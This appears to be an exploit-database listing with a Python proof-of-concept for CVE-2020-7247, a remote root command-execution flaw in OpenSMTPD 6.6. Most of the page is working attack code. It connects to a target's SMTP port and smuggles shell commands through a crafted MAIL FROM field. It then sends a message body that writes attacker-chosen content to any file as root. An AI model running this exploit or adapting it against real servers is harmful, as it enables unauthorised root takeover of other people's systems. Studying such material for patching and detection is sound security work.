Exploit for OpenBSD OpenSMTPD 6.6 Remote Code Execution CVE-2020-7247

Name: Exploit for OpenBSD OpenSMTPD 6.6 Remote Code Execution CVE-2020-7247
Rating: 5 (247 reviews)
2021-04-06 | CVSS 10.0
## https://sploitus.com/exploit?id=PACKETSTORM:162093
# Exploit Title: OpenBSD OpenSMTPD Remote Code Execution Vulnerability  
# Date: 05/04/2021  
# Exploit Author: Tobias Marcotto  
# Tested on: Kali Linux x64  
# Version: 6.6  
# Description: smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.  
# CVE : CVE-2020-7247  
  
  
*********************************************************************************************************  
  
  
import socket, time  
import sys  
  
HOST = input("what is the ip address of the host?: ")   
PORT = 25 # The same port as used by the server  
s = None  
  
writeto = input("Which file do you want to write to?: ")#raw inputen  
writewhat = input("What do you want to write to the file?: ")  
payload = b"""\r\n  
#0\r\n  
#1\r\n  
#2\r\n  
#3\r\n  
#4\r\n  
#5\r\n  
#6\r\n  
#7\r\n  
#8\r\n  
#9\r\n  
#a\r\n  
#b\r\n   
#c\r\n  
#d\r\n  
echo '"""+writewhat.encode()+b"""' > """+writeto.encode()+b"""  
.  
"""  
  
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):  
af, socktype, proto, canonname, sa = res  
try:  
s = socket.socket(af, socktype, proto)  
except OSError as msg:  
s = None  
continue  
try:  
s.connect(sa)  
except OSError as msg:  
s.close()  
s = None  
continue  
break  
if s is None:  
print('could not open socket')  
sys.exit(1)  
with s:  
data = s.recv(1024)  
print('Received', repr(data))  
time.sleep(1)  
print('sending')  
s.send(b"helo test.com\r\n")  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")  
time.sleep(1)  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(b"RCPT TO:<root>\r\n")  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(b"DATA\r\n")  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(payload)  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(b"QUIT\r\n")  
data = s.recv(1024)  
print('Received', repr(data))  
print("done")  
s.close()